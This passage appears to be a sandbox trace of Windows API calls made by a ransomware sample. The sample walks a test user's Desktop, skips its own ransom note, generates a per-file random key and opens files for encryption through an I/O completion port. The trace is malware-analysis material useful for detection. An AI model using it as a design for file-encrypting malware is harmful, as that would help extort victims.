(in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="FC") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="69") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="16") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="C6") returned 2 
[0166.088] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="32") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="F0") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="68") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="5E") returned 2 [0166.089] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\fW1l3mfnL9ahH.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\fW1l3mfnL9ahH.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\fW1l3mfnL9ahH.png" [0166.089] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.089] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.090] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a2813f0, ftCreationTime.dwHighDateTime=0x1d7df79, ftLastAccessTime.dwLowDateTime=0x7b57f520, ftLastAccessTime.dwHighDateTime=0x1d7e026, ftLastWriteTime.dwLowDateTime=0x7b57f520, ftLastWriteTime.dwHighDateTime=0x1d7e026, nFileSizeHigh=0x0, nFileSizeLow=0x8b9e, dwReserved0=0x0, dwReserved1=0x60, cFileName="gY8jhFMOKT6jD2Iu 4M.wav", cAlternateFileName="GY8JHF~1.WAV")) returned 1 [0166.098] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\gY8jhFMOKT6jD2Iu 4M.wav") returned 55 [0166.098] lstrcmpW (lpString1="gY8jhFMOKT6jD2Iu 4M.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.098] PathFindExtensionW (pszPath="gY8jhFMOKT6jD2Iu 4M.wav") returned=".wav" [0166.098] lstrlenW (lpString=".wav") returned 4 [0166.098] PathFindExtensionW (pszPath="gY8jhFMOKT6jD2Iu 4M.wav") returned=".wav" [0166.098] 
SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\gY8jhFMOKT6jD2Iu 4M.wav" (normalized: "c:\\users\\5alr3u30d3\\desktop\\gy8jhfmokt6jd2iu 4m.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.099] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=35742) returned 1 [0166.099] GetProcessHeap () returned 0x270000 [0166.099] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.100] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="13") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="84") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="A7") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="17") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="4E") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="85") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="3B") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="24") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="DE") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="E0") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="8F") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="89") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="D9") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="14") returned 2 
[0166.100] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="EB") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="C3") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="A2") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="2A") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="3E") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="0B") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="46") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="9C") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="BE") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="88") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="46") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="1C") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="10") returned 2 [0166.101] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="BC") returned 2 [0166.101] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="E6") returned 2 [0166.101] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="FE") returned 2 [0166.101] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="58") returned 2 [0166.101] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="07") returned 2 [0166.101] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\gY8jhFMOKT6jD2Iu 4M.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\gY8jhFMOKT6jD2Iu 4M.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\gY8jhFMOKT6jD2Iu 4M.wav" [0166.101] CreateIoCompletionPort (FileHandle=0x5ac, 
ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.101] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.109] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8def94e0, ftCreationTime.dwHighDateTime=0x1d7d987, ftLastAccessTime.dwLowDateTime=0xb8e10320, ftLastAccessTime.dwHighDateTime=0x1d7e51f, ftLastWriteTime.dwLowDateTime=0xb8e10320, ftLastWriteTime.dwHighDateTime=0x1d7e51f, nFileSizeHigh=0x0, nFileSizeLow=0x123b0, dwReserved0=0x0, dwReserved1=0x60, cFileName="HJvZ5y.bmp", cAlternateFileName="")) returned 1 [0166.109] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\HJvZ5y.bmp") returned 42 [0166.109] lstrcmpW (lpString1="HJvZ5y.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.109] PathFindExtensionW (pszPath="HJvZ5y.bmp") returned=".bmp" [0166.109] lstrlenW (lpString=".bmp") returned 4 [0166.109] PathFindExtensionW (pszPath="HJvZ5y.bmp") returned=".bmp" [0166.109] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb8e00c0, ftCreationTime.dwHighDateTime=0x1d7df37, ftLastAccessTime.dwLowDateTime=0x4af9bab0, ftLastAccessTime.dwHighDateTime=0x1d7e3f2, ftLastWriteTime.dwLowDateTime=0x4af9bab0, ftLastWriteTime.dwHighDateTime=0x1d7e3f2, nFileSizeHigh=0x0, nFileSizeLow=0x8b4b, dwReserved0=0x0, dwReserved1=0x60, cFileName="HRQrWoVqdDX0db4.csv", cAlternateFileName="HRQRWO~1.CSV")) returned 1 [0166.110] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\HRQrWoVqdDX0db4.csv") returned 51 [0166.110] lstrcmpW (lpString1="HRQrWoVqdDX0db4.csv", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.110] PathFindExtensionW (pszPath="HRQrWoVqdDX0db4.csv") returned=".csv" [0166.110] lstrlenW (lpString=".csv") returned 4 [0166.110] PathFindExtensionW (pszPath="HRQrWoVqdDX0db4.csv") returned=".csv" [0166.110] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\HRQrWoVqdDX0db4.csv" (normalized: "c:\\users\\5alr3u30d3\\desktop\\hrqrwovqddx0db4.csv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.110] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=35659) returned 1 [0166.110] GetProcessHeap () returned 0x270000 [0166.111] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.111] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="59") returned 2 [0166.111] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="82") returned 2 [0166.111] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="07") returned 2 [0166.111] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="13") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="DC") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="0E") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="10") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="9A") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="A2") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="27") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="BC") returned 2 [0166.112] wsprintfW 
(in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="D1") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="47") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="4F") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="73") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="A2") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="20") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="43") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="87") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="DF") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="EA") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="4B") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="54") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="FA") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="40") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="B1") returned 2 [0166.113] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="09") returned 2 [0166.113] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="1D") returned 2 [0166.113] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="16") returned 2 [0166.113] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="27") returned 2 [0166.113] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="F4") returned 2 [0166.113] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="29") returned 2 [0166.113] lstrcpyW (in: lpString1=0x74d20bc, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\HRQrWoVqdDX0db4.csv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\HRQrWoVqdDX0db4.csv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\HRQrWoVqdDX0db4.csv" [0166.114] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.114] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.123] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb32bd790, ftCreationTime.dwHighDateTime=0x1d7dbfe, ftLastAccessTime.dwLowDateTime=0x11447df0, ftLastAccessTime.dwHighDateTime=0x1d7dcbd, ftLastWriteTime.dwLowDateTime=0x11447df0, ftLastWriteTime.dwHighDateTime=0x1d7dcbd, nFileSizeHigh=0x0, nFileSizeLow=0x12c7, dwReserved0=0x0, dwReserved1=0x60, cFileName="jjaPO1 SfWeJ9Wx0cO.jpg", cAlternateFileName="JJAPO1~1.JPG")) returned 1 [0166.123] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\jjaPO1 SfWeJ9Wx0cO.jpg") returned 54 [0166.123] lstrcmpW (lpString1="jjaPO1 SfWeJ9Wx0cO.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.123] PathFindExtensionW (pszPath="jjaPO1 SfWeJ9Wx0cO.jpg") returned=".jpg" [0166.123] lstrlenW (lpString=".jpg") returned 4 [0166.123] PathFindExtensionW (pszPath="jjaPO1 SfWeJ9Wx0cO.jpg") returned=".jpg" [0166.123] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\jjaPO1 SfWeJ9Wx0cO.jpg" (normalized: "c:\\users\\5alr3u30d3\\desktop\\jjapo1 sfwej9wx0co.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, 
hTemplateFile=0x0) returned 0x5ac [0166.124] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=4807) returned 1 [0166.124] GetProcessHeap () returned 0x270000 [0166.124] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.125] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="94") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="37") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="5F") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="23") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="EA") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="7F") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="26") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="CB") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="85") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="1A") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="7C") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="40") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="2B") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="F8") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="C7") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="E7") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="8D") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="9B") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" 
| out: param_1="D6") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="B2") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="87") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="ED") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="37") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="7D") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="A1") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="31") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="4B") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="01") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="CF") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="82") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="83") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="2D") returned 2 [0166.127] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\jjaPO1 SfWeJ9Wx0cO.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\jjaPO1 SfWeJ9Wx0cO.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\jjaPO1 SfWeJ9Wx0cO.jpg" [0166.127] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.127] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.137] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c958db0, 
ftCreationTime.dwHighDateTime=0x1d7de1c, ftLastAccessTime.dwLowDateTime=0x77e1b870, ftLastAccessTime.dwHighDateTime=0x1d7e3bb, ftLastWriteTime.dwLowDateTime=0x77e1b870, ftLastWriteTime.dwHighDateTime=0x1d7e3bb, nFileSizeHigh=0x0, nFileSizeLow=0x1802d, dwReserved0=0x0, dwReserved1=0x60, cFileName="kgq2pSzeYt44pMh3hD.avi", cAlternateFileName="KGQ2PS~1.AVI")) returned 1 [0166.137] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\kgq2pSzeYt44pMh3hD.avi") returned 54 [0166.137] lstrcmpW (lpString1="kgq2pSzeYt44pMh3hD.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.137] PathFindExtensionW (pszPath="kgq2pSzeYt44pMh3hD.avi") returned=".avi" [0166.137] lstrlenW (lpString=".avi") returned 4 [0166.137] PathFindExtensionW (pszPath="kgq2pSzeYt44pMh3hD.avi") returned=".avi" [0166.137] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\kgq2pSzeYt44pMh3hD.avi" (normalized: "c:\\users\\5alr3u30d3\\desktop\\kgq2pszeyt44pmh3hd.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.138] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=98349) returned 1 [0166.138] GetProcessHeap () returned 0x270000 [0166.138] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.139] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="83") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="7C") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="A4") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="78") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd52, 
param_2="%02X" | out: param_1="DE") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="1F") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="A6") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="97") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="4A") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="37") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="92") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="C5") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="0C") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="B6") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="B6") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="19") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="00") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="8A") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="1B") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="F1") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="7C") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="11") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="C6") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="35") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="6A") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="4A") returned 2 [0166.140] wsprintfW 
(in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="63") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="8E") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="54") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="3B") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="AB") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="27") returned 2 [0166.141] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\kgq2pSzeYt44pMh3hD.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\kgq2pSzeYt44pMh3hD.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\kgq2pSzeYt44pMh3hD.avi" [0166.141] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.141] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.150] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71bf99d0, ftCreationTime.dwHighDateTime=0x1d7d8a3, ftLastAccessTime.dwLowDateTime=0xf16cd100, ftLastAccessTime.dwHighDateTime=0x1d7e633, ftLastWriteTime.dwLowDateTime=0xf16cd100, ftLastWriteTime.dwHighDateTime=0x1d7e633, nFileSizeHigh=0x0, nFileSizeLow=0x12a03, dwReserved0=0x0, dwReserved1=0x60, cFileName="kODA.swf", cAlternateFileName="")) returned 1 [0166.150] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\kODA.swf") returned 40 [0166.150] lstrcmpW (lpString1="kODA.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.150] PathFindExtensionW (pszPath="kODA.swf") returned=".swf" [0166.150] lstrlenW (lpString=".swf") 
returned 4 [0166.150] PathFindExtensionW (pszPath="kODA.swf") returned=".swf" [0166.150] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13daccd0, ftCreationTime.dwHighDateTime=0x1d7e55b, ftLastAccessTime.dwLowDateTime=0x47cbe850, ftLastAccessTime.dwHighDateTime=0x1d7e57c, ftLastWriteTime.dwLowDateTime=0x47cbe850, ftLastWriteTime.dwHighDateTime=0x1d7e57c, nFileSizeHigh=0x0, nFileSizeLow=0xe131, dwReserved0=0x0, dwReserved1=0x60, cFileName="l-iuN1.bmp", cAlternateFileName="")) returned 1 [0166.150] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\l-iuN1.bmp") returned 42 [0166.150] lstrcmpW (lpString1="l-iuN1.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.150] PathFindExtensionW (pszPath="l-iuN1.bmp") returned=".bmp" [0166.156] lstrlenW (lpString=".bmp") returned 4 [0166.156] 